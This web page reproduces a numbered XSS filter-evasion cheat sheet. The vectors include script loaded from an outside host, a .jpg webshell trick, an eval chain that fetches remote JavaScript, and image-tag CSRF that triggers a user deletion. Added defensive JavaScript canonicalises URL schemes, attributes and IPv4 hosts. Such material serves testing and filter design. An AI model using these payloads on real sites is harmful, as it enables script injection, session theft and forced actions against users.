Cross-site image shell

XSS cross-site code: <script>alert("")</script>

Put that code on the first line of the webshell, save the shell with a .jpg extension, and when the image-format shell is requested the script runs as well. This only works when the browser ignores the image Content-Type and sniffs the body as HTML: old versions of Internet Explorer did that, current browsers do not, and a server that sends X-Content-Type-Options: nosniff closes the hole entirely.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript directive
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (the semicolons are required). The numeric character references were decoded when this page was saved, so the vector appears here in decoded form:
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (use the encoder/calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (use the encoder/calculator)
<IMG SRC=jav..omitted..S')>

(9) Long UTF-8 Unicode encoding, padded to 7 digits, without semicolons (use the encoder/calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (use the encoder/calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab splitting the word "javascript" (the tab shows up as a space in this copy)
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab splitting the word "javascript" (decoded to a space in this copy)
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline (shown as a space in this copy)
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return (shown as a space in this copy)
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (all the pieces must sit on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null characters
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null characters 2 (null bytes are basically useless on domestic sites, because there is nowhere left that accepts them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
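Vectors (3) to (19), and (47) further down, all reach the same javascript: scheme by different spellings: case changes, numeric character references with and without semicolons, an embedded tab, newline or carriage return, a null byte, and control characters in front of the scheme. A filter that string-matches "javascript:" misses most of them; a check has to decode and strip the way the browser does before it looks at the scheme. The JavaScript below is an added example written for this page, not part of the original cheat sheet: it decodes numeric references, strips the characters listed under (47), then allow-lists the scheme. The function names and the sample inputs are my own. Stripping those characters anywhere in the value, rather than only at the ends as a current URL parser does, is a deliberate over-approximation so that the legacy Internet Explorer tricks (mid-word null byte, leading &#14;) are rejected too.

```javascript
// Decode numeric character references (&#106; &#0000106 &#x6A ...). As in a
// browser, the semicolon is optional and hex digits are consumed greedily.
// Named entities are out of scope for this example.
function decodeNumericRefs(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, num) => {
    const cp = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return cp > 0x10ffff ? match : String.fromCodePoint(cp);
  });
}

// Characters legacy browsers ignored inside a URL attribute or CSS url():
// C0 controls and space, DEL, NBSP, U+2000-U+2008 (my reading of "8192-8"
// in vector 47), U+3000 and the BOM. Removing them anywhere over-approximates.
const IGNORED_CHARS = /[\u0000-\u0020\u007f\u00a0\u2000-\u2008\u3000\ufeff]/g;

function canonicalizeUrlAttr(value) {
  return decodeNumericRefs(value).replace(IGNORED_CHARS, '');
}

// Scheme of the canonicalised value, lower-cased, or null for a relative URL.
function urlAttrScheme(value) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(canonicalizeUrlAttr(value));
  return m ? m[1].toLowerCase() : null;
}

// Allow-list, not block-list: only these schemes (or no scheme at all) pass.
const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']);

function isSafeUrlAttr(value) {
  const scheme = urlAttrScheme(value);
  return scheme === null || SAFE_SCHEMES.has(scheme);
}

// Constructed inputs modelled on the vectors above (not copied from the page).
const SAMPLE_VECTORS = [
  "javascript:alert('XSS')",
  "JaVaScRiPt:alert('XSS')",
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
  "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')",
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",
  "jav\tascript:alert('XSS');",
  "jav&#x0A;ascript:alert('XSS');",
  " &#14;  javascript:alert('XSS');",
  "java\u0000script:alert(\"XSS\")",
  'vbscript:msgbox("XSS")',
  "http://3w.org/XSS/xss.js",
  "/images/logo.jpg",
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const v of SAMPLE_VECTORS) {
    console.log(JSON.stringify(v), '->', urlAttrScheme(v), isSafeUrlAttr(v) ? 'allowed' : 'rejected');
  }
}
```

Every javascript: and vbscript: spelling in SAMPLE_VECTORS canonicalises to the same scheme and is rejected; the http URL and the relative path are allowed. The same canonicalise-then-allow-list order applies to CSS url() values.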
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag (the event handler is missing from this copy of the vector; what remains is shown as-is)
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with an extra URL parameter
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters in front of the JavaScript (any of the code points 1-32, 34, 39, 160, 8192-8, 13, 12288, 65279 are ignored there)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">
(48) DIV expression (expression() is an Internet Explorer-only CSS extension)
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with the expression split up
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (an open angle bracket followed by a letter is all it takes)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE tag using background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression (only this fragment of the vector survives in the source)
exppression(alert("XSS"))'>

(53) STYLE tag using background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that carries the XSS (Flash content no longer runs in current browsers)
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
(56) Using ActionScript inside the Flash file to smuggle in the XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace (Internet Explorer HTML Components): the .HTC file must be on the same server as the XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JavaScript is filtered you can put the code inside an image file and load that as the script (the URL is blank in the source)
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded commands. The victim's browser fetches the image URL with the victim's cookies attached, so any action the target site performs on a GET request runs with the victim's privileges (a CSRF carried by an image tag; browsers that default cookies to SameSite=Lax no longer send them on such cross-site image requests)
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded commands with a.jpg on your own server: a 302 redirect turns the harmless-looking image URL into the privileged request
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Getting past symbol filtering: the quoted ">" makes a filter that stops at the first ">" miss the SRC that follows it
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
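Vectors (61) to (67) are aimed at a filter that permits inline script but refuses remote script. The page does not say which filter, so the regex below, /<script[^>]+src/i, is my assumption of the classic target: [^>]+ cannot cross the ">" inside the quoted attribute, so the filter sees an inline <SCRIPT> while the browser's tokenizer, which honours the quotes, sees a SRC. The JavaScript below is an added example for this page, not part of the cheat sheet: it runs that regex beside a small attribute tokenizer that follows the HTML start-tag states (only double and single quotes delimit a value, as in current browsers) over copies of the seven vectors. Function names are my own. Two things are worth noting in the result: (62) and (65) only load the script in old Internet Explorer, since a current parser ends the tag at the first ">" in them and does not treat backticks as quotes; and (67) is invisible to any static check because the tag is assembled by document.write at run time, which is the argument for output encoding over block-lists.

```javascript
// The kind of block-list filter vectors 61-67 are aimed at (my assumption):
// inline <script> is allowed, a script with a src attribute is refused.
const NAIVE_REMOTE_SCRIPT = /<script[^>]+src/i;

function naiveFilterFlags(html) {
  return NAIVE_REMOTE_SCRIPT.test(html);
}

const isSpace = (c) => c === ' ' || c === '\t' || c === '\n' || c === '\r' || c === '\f';

// Attributes of the first <script ...> start tag, parsed with a simplified
// version of the WHATWG "before attribute name" / "attribute name" /
// "attribute value" tokenizer states. Only " and ' quote a value; a stray
// '=' or quote character becomes part of an attribute name, as in the spec.
function scriptStartTagAttrs(html) {
  const open = /<script(?=[\s/>])/i.exec(html);
  if (!open) return null;
  const n = html.length;
  let i = open.index + open[0].length;
  const attrs = {};
  while (i < n) {
    while (i < n && (isSpace(html[i]) || html[i] === '/')) i++;   // before attribute name
    if (i >= n || html[i] === '>') break;                           // end of the start tag
    let name = '';
    if (html[i] === '=') name += html[i++];                         // '=' may start a name (parse error)
    while (i < n && !isSpace(html[i]) && html[i] !== '/' && html[i] !== '>' && html[i] !== '=') {
      name += html[i++];
    }
    while (i < n && isSpace(html[i])) i++;                          // after attribute name
    let value = '';
    if (i < n && html[i] === '=') {
      i++;
      while (i < n && isSpace(html[i])) i++;                        // before attribute value
      const q = html[i];
      if (q === '"' || q === "'") {
        i++;
        while (i < n && html[i] !== q) value += html[i++];          // quoted value may hold '>'
        i++;                                                        // closing quote
      } else {
        while (i < n && !isSpace(html[i]) && html[i] !== '>') value += html[i++];
      }
    }
    name = name.toLowerCase();
    if (!(name in attrs)) attrs[name] = value;                      // first duplicate wins
  }
  return attrs;
}

// True when a current browser would fetch a remote script from this markup.
function loadsRemoteScript(html) {
  const attrs = scriptStartTagAttrs(html);
  return attrs !== null && 'src' in attrs;
}

// Copies of vectors 61-67 with straight quotes (constructed from the page).
const VECTORS = {
  61: '<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>',
  62: '<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>',
  63: '<SCRIPT a=">" \'\' SRC="http://3w.org/xss.js"></SCRIPT>',
  64: '<SCRIPT "a=\'>\'" SRC="http://3w.org/xss.js"></SCRIPT>',
  65: '<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>',
  66: '<SCRIPT a=">\'>" SRC="http://3w.org/xss.js"></SCRIPT>',
  67: '<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>',
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const [num, html] of Object.entries(VECTORS)) {
    console.log(num, 'regex flags it:', naiveFilterFlags(html), ' browser loads src:', loadsRemoteScript(html));
  }
}
```

The regex flags none of the seven; the tokenizer finds a src attribute in (61), (63), (64) and (66). Neither check can see (67), whose tag only exists after the inline script runs.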
(68) IP address instead of hostname
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding (the percent-encoded hostname was decoded when this page was saved)
<A HREF="http://3w.org">XSS</A>

(70) Decimal (dword) IP address
<A HREF="http://3232235521">XSS</A>

(71) Hexadecimal IP address
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP address
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding (the line break and the whitespace inside the URL are part of the vector)
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Dropping the "http:"
<A HREF="//www.google.com/">XSS</A>

(75) Dropping the "www"
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
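Vectors (68) to (76) spell the same few hosts in different ways: 3232235521, 0xc0.0xa8.0x00.0x01 and 0300.0250.0000.0001 are all 192.168.0.1, and 66.000146.0x7.147 is 66.102.7.147, because the URL parser accepts an IPv4 host as a single 32-bit number or as up to four labels in decimal, octal (leading 0) or hexadecimal (0x), and throws away tabs and newlines before it starts. A host allow-list or block-list that compares strings must canonicalise first. The JavaScript below is an added example for this page, not from the original: canonicalIpv4 reimplements the IPv4 parsing rule and canonicalHost applies it to a raw, possibly obfuscated URL. The names are my own; the comparison against Node's built-in WHATWG URL parser in the demo shows it reaches the same answer.

```javascript
// Parse one dotted-IPv4 label the way the URL parser does: "0x.." is hex,
// a leading "0" means octal, anything else is decimal. null = not a number.
function parseIpv4Number(part) {
  let radix = 10;
  let digits = part;
  if (/^0x/i.test(part)) { radix = 16; digits = part.slice(2); }
  else if (part.length > 1 && part[0] === '0') { radix = 8; digits = part.slice(1); }
  if (digits === '') return radix === 10 ? null : 0;          // "0x" alone is zero
  const ok = { 8: /^[0-7]+$/, 10: /^[0-9]+$/, 16: /^[0-9a-f]+$/i }[radix];
  return ok.test(digits) ? parseInt(digits, radix) : null;
}

// Canonical dotted quad for a numeric host (dword, hex, octal, mixed, or fewer
// than four labels), or null when the host is not an IPv4 literal at all.
function canonicalIpv4(host) {
  const parts = host.split('.');
  if (parts.length > 1 && parts[parts.length - 1] === '') parts.pop();  // trailing dot
  if (parts.length > 4) return null;
  const nums = parts.map(parseIpv4Number);
  if (nums.some((n) => n === null)) return null;
  const head = nums.slice(0, -1);
  const last = nums[nums.length - 1];
  if (head.some((n) => n > 255)) return null;
  if (last >= 256 ** (5 - nums.length)) return null;          // last label fills the remaining bytes
  let v = last;
  head.forEach((n, i) => { v += n * 256 ** (3 - i); });
  return [v >>> 24, (v >>> 16) & 255, (v >>> 8) & 255, v & 255].join('.');
}

// Host of an absolute or scheme-relative URL, canonicalised. Tabs and newlines
// are removed first, as the URL parser does, so vector 73 resolves too.
function canonicalHost(url) {
  const cleaned = url.replace(/[\t\n\r]/g, '');
  const m = /^(?:[a-z][a-z0-9+.-]*:)?\/\/([^/?#]*)/i.exec(cleaned);
  if (!m) return null;                                          // relative URL: no host
  const host = m[1].replace(/^.*@/, '').replace(/:\d*$/, '').toLowerCase(); // drop userinfo, port
  const ip = canonicalIpv4(host);
  return ip !== null ? ip : host.replace(/\.$/, '');            // strip the absolute-DNS dot
}

// Constructed from vectors 68-76 on this page.
const SAMPLE_URLS = [
  'http://127.0.0.1/',
  'http://3232235521/',
  'http://0xc0.0xa8.0x00.0x01/',
  'http://0300.0250.0000.0001/',
  'h\ntt\tp://6\t6.000146.0x7.147/',
  '//www.google.com/',
  'http://google.com/',
  'http://www.google.com./',
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const u of SAMPLE_URLS) {
    const viaNode = (() => { try { return new URL(u.replace(/[\t\n\r]/g, ''), 'http://x/').hostname; } catch { return 'n/a'; } })();
    console.log(JSON.stringify(u), '->', canonicalHost(u), '(Node URL parser:', viaNode + ')');
  }
}
```

A practical consequence: compare canonical hosts, never raw URL strings, when deciding whether a link or redirect target is on your own domain.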
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>